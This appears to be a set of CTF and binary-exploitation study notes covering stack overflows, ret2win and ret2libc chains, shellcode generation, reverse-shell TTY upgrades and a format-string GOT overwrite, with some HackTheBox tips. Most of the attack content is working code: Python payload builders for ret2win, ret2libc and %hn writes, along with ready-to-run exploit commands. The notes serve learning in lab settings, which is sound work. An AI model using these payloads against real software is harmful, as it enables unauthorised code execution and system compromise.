00

  • Check which mitigations the binary was built with (canary, NX, PIE, RELRO):
checksec --file <filename>
  • Compile a test binary without the stack canary (-fno-stack-protector), without NX (-z execstack) and without PIE (-no-pie); -m32 builds it as 32-bit:
gcc <filename>.c -o <filename> -fno-stack-protector -z execstack -no-pie -m32

01

GDB-Pwndbg:

  • Execution stops at the breakpoint, before the instruction at that address runs.

To inspect a local variable or condition, examine its stack slot. The command below prints the address of the slot (here ebp-0xc) and the value stored there; note this is a memory address on the stack, not a register:

x/wx $ebp-0xc

You can then overwrite the value at that address (gdb needs the cast to know how wide the write is):

set *(int *)0xffffceac = 1

02

If the file type is LSB (little-endian), the bytes of an address are written in reverse order: 0xdeadbeef becomes \xef\xbe\xad\xde. To build it:

python2 -c 'print 32 * "A" + "\xef\xbe\xad\xde"'

Write it to a file and feed it to the program on stdin (python2's print appends a newline, which is usually harmless):

python2 -c 'print 32 * "A" + "\xef\xbe\xad\xde"' > payload
./runMeImaFile < payload

03

Radare2 (analyse the binary, then list its functions):

aa
afl

We can use cyclic 100 in gdb-pwndbg to generate a pattern, then feed it to the program. When it crashes, take the 4 characters that ended up in the register (eg eip) and run cyclic -l <string>, for example:

cyclic -l haaa

It returns the offset, i.e. how many bytes of padding we need before the saved return address is overwritten.

If the function we want to reach is at 0x08049182 for example, and the offset is 28, we can do:

python2 -c 'print "A" * 28 + "\x82\x91\x04\x08"' > payload

On 64-bit, parameters are passed in registers, so we also need pop gadgets; ropper finds them:

ropper --file ret2win_params --search "pop rsi"

04

We generate the cyclic pattern, then figure out how much to overflow. We find the return address (where the function returns to), set a breakpoint on it, then run the program with the generated payload.

deadbeef = \xef\xbe\xad\xde

On 32-bit the caller pushes the parameters and then the call instruction pushes the return address, so on entry a function expects [return address][param 1][param 2] at the top of the stack. A ret2win payload with parameters therefore looks like [padding][target function][fake return address][param 1][param 2].

With 64-bit the parameters are passed in registers (rdi, rsi, rdx, ...), so we have to populate those with pop gadgets rather than just placing the values on the stack. Also, when running cyclic, rip is not overwritten (the ret faults on the non-canonical address), so take the value from rsp instead, for example the first four characters, and pass them to cyclic -l.
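The whole pattern, offset and payload procedure from 03 and 04, as an added Python example that is not part of the original notes. It reimplements the de Bruijn pattern that pwndbg's cyclic uses (so cyclic -l haaa and cyclic_find("haaa") agree), then builds the 32-bit payload with a fake return address and parameters, and the 64-bit variant with pop gadgets. The target address 0x08049182 comes from the notes above; the 64-bit target, gadget addresses and argument values are assumed placeholders.

```python
import struct
from itertools import islice

ALPHABET = "abcdefghijklmnopqrstuvwxyz"


def de_bruijn(alphabet=ALPHABET, n=4):
    """Lazily yield the de Bruijn sequence B(k, n) over `alphabet`: every
    n-character window occurs exactly once, which is what lets cyclic -l map
    a 4-byte register value back to an offset. Same construction as
    pwntools/pwndbg, so the prefix is "aaaabaaacaaadaaa..."."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for c in a[1:p + 1]:
                    yield alphabet[c]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length):
    """Equivalent of `cyclic <length>` in pwndbg."""
    return "".join(islice(de_bruijn(), length))


def cyclic_find(value, max_len=0x10000):
    """Equivalent of `cyclic -l <value>`: `value` is either the 4 characters
    seen in the register or the integer gdb shows for it (little-endian,
    so 0x61616168 is "haaa"). Returns -1 if the window is not in the pattern."""
    if isinstance(value, int):
        value = struct.pack("<I", value).decode()
    assert len(value) == 4, "give the first 4 bytes of the pattern"
    return cyclic(max_len).find(value)


def p32(v):
    return struct.pack("<I", v)


def p64(v):
    return struct.pack("<Q", v)


def ret2win_payload_32(offset, target, args=(), fake_ret=0xdeadbeef):
    """32-bit layout after the overflow: [padding][target][return address
    the target will use when it returns][arg1][arg2]..., because a cdecl
    function expects its parameters just above its return address."""
    payload = b"A" * offset + p32(target) + p32(fake_ret)
    return payload + b"".join(p32(a) for a in args)


def ret2win_payload_64(offset, target, args, gadgets):
    """64-bit: the first arguments live in rdi, rsi, rdx, so each one needs
    a `pop <reg>; ret` gadget (addresses in `gadgets`, e.g. from ropper)
    placed before the target address."""
    regs = ("rdi", "rsi", "rdx")
    payload = b"A" * offset
    for reg, value in zip(regs, args):
        payload += p64(gadgets[reg]) + p64(value)
    return payload + p64(target)


if __name__ == "__main__":
    # Assumed crash: eip held "haaa" after sending cyclic(100).
    offset = cyclic_find("haaa")  # same result as `cyclic -l haaa`
    print(ret2win_payload_32(offset, 0x08049182).hex())
    # Assumed 64-bit gadget/target addresses (placeholders; find real ones with ropper).
    gadgets = {"rdi": 0x401111, "rsi": 0x401222}
    print(ret2win_payload_64(40, 0x401234, [0xdeadbeef, 0xcafebabe], gadgets).hex())
```

On 64-bit, if the target calls libc functions that use SSE (system, printf), the stack must be 16-byte aligned at the call; if it crashes on a movaps, insert the address of a lone `ret` gadget before the target address.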

05

Getting a shell:

shellcraft -l
shellcraft i386.linux.sh

# to get it in assembly:
shellcraft i386.linux.sh -f a

To upgrade a dumb shell (for example a reverse shell) to a fully interactive TTY:

python3 -c 'import pty;pty.spawn("/bin/bash");'
# control + z
stty raw -echo; fg;
export TERM=xterm

06

This file has NX enabled, as checksec shows, so shellcode placed on the stack will not execute. Instead we return into libc and call system("/bin/sh") (ret2libc).

To turn off the randomiser (ASLR), so the libc base printed by ldd matches the address at runtime:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

To find which libc is loaded and its base address:

ldd <filename>

To find the offset from the libc base to system (-w avoids also matching __libc_system and similar names):

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -w system

To find the offset to the "/bin/sh" string (-t x prints the offset in hex):

strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"

The addresses that go into the payload are libc base + offset.
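The ret2libc address arithmetic above, as an added Python example that is not part of the original notes. It parses the ldd, readelf -s and strings -t x output formats, resolves base + offset for system, exit and "/bin/sh", and lays out the 32-bit chain. The tool output embedded below is constructed for the example (the paths follow the notes above, but the addresses and offsets are made-up values, not those of any real libc build); the ldd base is only valid with ASLR off.

```python
import re
import struct

# Constructed tool output (illustrative values, not from a real libc build).
LDD_OUTPUT = """\
\tlinux-gate.so.1 (0xf7fc8000)
\tlibc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7d8f000)
\t/lib/ld-linux.so.2 (0xf7fca000)
"""

READELF_OUTPUT = """\
   141: 0003a460    32 FUNC    GLOBAL DEFAULT   15 exit@@GLIBC_2.0
   245: 00048170    63 FUNC    WEAK   DEFAULT   15 system@@GLIBC_2.0
   621: 000e1c80    35 FUNC    GLOBAL DEFAULT   15 svcerr_systemerr@@GLIBC_2.0
  1460: 00048170    63 FUNC    GLOBAL DEFAULT   15 __libc_system@@GLIBC_PRIVATE
"""

STRINGS_OUTPUT = """\
 19dbd8 /bin/csh
 1bd0d5 /bin/sh
 1bd0dd /bin/sh -c
"""


def p32(v):
    return struct.pack("<I", v)


def libc_base(ldd_output, lib="libc.so.6"):
    """Path and load address of `lib` from `ldd <binary>` output. The address
    only matches the real process when ASLR is off (randomize_va_space = 0)."""
    m = re.search(r"%s => (\S+) \(0x([0-9a-f]+)\)" % re.escape(lib), ldd_output)
    if m is None:
        raise ValueError("%s not found in ldd output" % lib)
    return m.group(1), int(m.group(2), 16)


def symbol_offset(readelf_output, name):
    """Offset of symbol `name` from `readelf -s libc.so.6`. Matches the name
    exactly: a plain grep for "system" also hits __libc_system and
    svcerr_systemerr, which would give the wrong offset."""
    for line in readelf_output.splitlines():
        fields = line.split()
        if len(fields) >= 8 and fields[7].split("@")[0] == name:
            return int(fields[1], 16)
    raise KeyError(name)


def string_offset(strings_output, wanted):
    """Offset of the exact string `wanted` from `strings -a -t x libc.so.6`."""
    for line in strings_output.splitlines():
        off, _, text = line.strip().partition(" ")
        if text == wanted:
            return int(off, 16)
    raise KeyError(wanted)


def ret2libc_payload(offset, base, system_off, exit_off, binsh_off):
    """32-bit ret2libc chain: [padding][system][return address for system,
    here exit so the process ends cleanly][pointer to "/bin/sh"]. system's
    single argument sits just above its return address, as in any cdecl call."""
    return (b"A" * offset
            + p32(base + system_off)
            + p32(base + exit_off)
            + p32(base + binsh_off))


def build_from_tool_output(offset, ldd_output, readelf_output, strings_output):
    """Resolve every address as libc base + offset and build the chain."""
    _, base = libc_base(ldd_output)
    return ret2libc_payload(offset, base,
                            symbol_offset(readelf_output, "system"),
                            symbol_offset(readelf_output, "exit"),
                            string_offset(strings_output, "/bin/sh"))


if __name__ == "__main__":
    # Assumed offset of 28 bytes to the saved return address.
    print(build_from_tool_output(28, LDD_OUTPUT, READELF_OUTPUT, STRINGS_OUTPUT).hex())
```

With ASLR on, the same arithmetic applies, but the base must come from a runtime leak (a GOT entry printed back by the program, for example) rather than from ldd.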

08

To identify the libc on a remote server: https://libc.blukat.me/ takes a leaked address (for example of puts) and matches it against known libc builds.

We can find the GOT entry of printf in Ghidra, inside .got.plt. With a format string bug we can then write the address of system into it, so the next printf(buf) call runs system(buf).

Tutorial

  • Need to overwrite 0x0804c00c (GOT.printf) with 0xf7dff040 (LIBC.system).

  • %hn writes 2 bytes at a time, so that means writing 0xf040 (61504) @ 0x0804c00c (low order half) and 0xf7df (63455) @ 0x0804c00c + 2 = 0x0804c00e (high order half).

  • Now we have to figure out the padding for each write. %n stores the number of bytes printed so far, so the formula is:

[The value we want] - [The bytes already written] = [The padding to set]

  • Start with the low order bytes, because the counter only grows and 61504 is the smaller of the two values:

It will be 61504 - 8 = 61496, because we have already written 8 bytes (the two 4-byte addresses).

  • Then the high order bytes:

It will be 63455 - 61504 = 1951, because we have already written 61504 bytes (the two 4-byte addresses plus the 61496 bytes of padding from the previous write).

  • Now we can construct the exploit (note our buffer starts at printf argument %4, so we use [%4,%5] as offsets instead of [%7,%8]):
      \x0c\xc0\x04\x08 is 0x0804c00c in little-endian; it is argument %4 and points to the low order bytes.
      \x0e\xc0\x04\x08 is 0x0804c00e in little-endian; it is argument %5 and points to the high order bytes.
      %61496x prints 61496 bytes of padding on the standard output.
      %4$hn writes the counter so far, 8 + 61496 = 61504 (0xf040), as a 2-byte short at the first address (0x0804c00c).
      %1951x prints 1951 more bytes of padding.
      %5$hn writes 8 + 61496 + 1951 = 63455 (0xf7df) at the second address (0x0804c00e).

python2 -c 'print("\x0c\xc0\x04\x08\x0e\xc0\x04\x08%61496x%4$hn%1951x%5$hn")' > payload
(cat payload; cat) | ./got_overwrite

The trailing cat keeps stdin open, so we can type into the shell that system() spawns.
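The padding calculation above, generalised, as an added Python example that is not part of the original notes or the tutorial it follows. fmt_hn_payload computes the two %hn writes for any 32-bit value, handling the two cases the hand calculation glosses over: when the high half is smaller than the low half the writes have to be reordered (the counter never decreases), and when a padding width comes out too small to be printed exactly, 0x10000 is added so the short is unchanged. simulate_hn models printf's counter to check the result. The GOT and system addresses are the ones from the tutorial above; the argument index 4 is likewise taken from it.

```python
import re
import struct

SHORT = 0xffff


def p32(v):
    return struct.pack("<I", v)


def fmt_hn_payload(target, value, arg_index):
    """Build a format string that writes the 32-bit `value` to `target` with
    two %hn (2-byte) writes, assuming the start of our buffer is printf
    positional argument number `arg_index`."""
    halves = [
        (target, value & SHORT, arg_index),         # low 16 bits
        (target + 2, value >> 16, arg_index + 1),   # high 16 bits
    ]
    prefix = b"".join(p32(addr) for addr, _, _ in halves)
    written = len(prefix)  # the addresses themselves are printed first
    fmt = ""
    # %n stores the running output count, which only grows, so the half
    # with the smaller value is written first whichever address it is.
    for _, want, idx in sorted(halves, key=lambda h: h[1]):
        need = (want - written) & SHORT
        # %Nx prints at least as many characters as the hex argument needs
        # (up to 8 on 32-bit), so a tiny width would overshoot. Adding 0x10000
        # leaves the low 16 bits of the counter, and so the short, unchanged.
        if need < 8:
            need += 0x10000
        fmt += "%%%dx%%%d$hn" % (need, idx)
        written += need
    return prefix + fmt.encode()


def simulate_hn(payload, arg_index, n_addrs=2):
    """Model printf's output counter over `payload` and return the shorts it
    would store, as {address: value}. Assumes each %Nx prints exactly N chars."""
    addrs = [struct.unpack("<I", payload[i * 4:(i + 1) * 4])[0]
             for i in range(n_addrs)]
    written = 4 * n_addrs
    mem = {}
    for width, idx in re.findall(rb"%(\d+)x%(\d+)\$hn", payload[4 * n_addrs:]):
        written += int(width)
        mem[addrs[int(idx) - arg_index]] = written & SHORT
    return mem


def read32(mem, addr):
    """Reassemble the two shorts at addr and addr+2 (little-endian)."""
    return mem[addr] | (mem[addr + 2] << 16)


if __name__ == "__main__":
    got_printf, libc_system = 0x0804c00c, 0xf7dff040  # values from the tutorial
    payload = fmt_hn_payload(got_printf, libc_system, 4)
    print(payload)
    assert read32(simulate_hn(payload, 4), got_printf) == libc_system
```

For the tutorial's values the function reproduces the hand-built string exactly; for a value such as 0x1234f040 it emits the %5$hn write before the %4$hn one.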

HTB - Explosion (Starting Point)

  • Info on ports here.

HTB - Preignition (Starting Point)

  • Dir busting:
sudo gobuster dir -w /usr/share/wordlists/dirb/common.txt -u {ip}

HTB - Bike (Starting Point)

Hacktricks guide (here)

Useful tools

  • Ghidra
  • GDB
  • Radare2
  • Ropper
  • GDB-PwnDBG
  • LTrace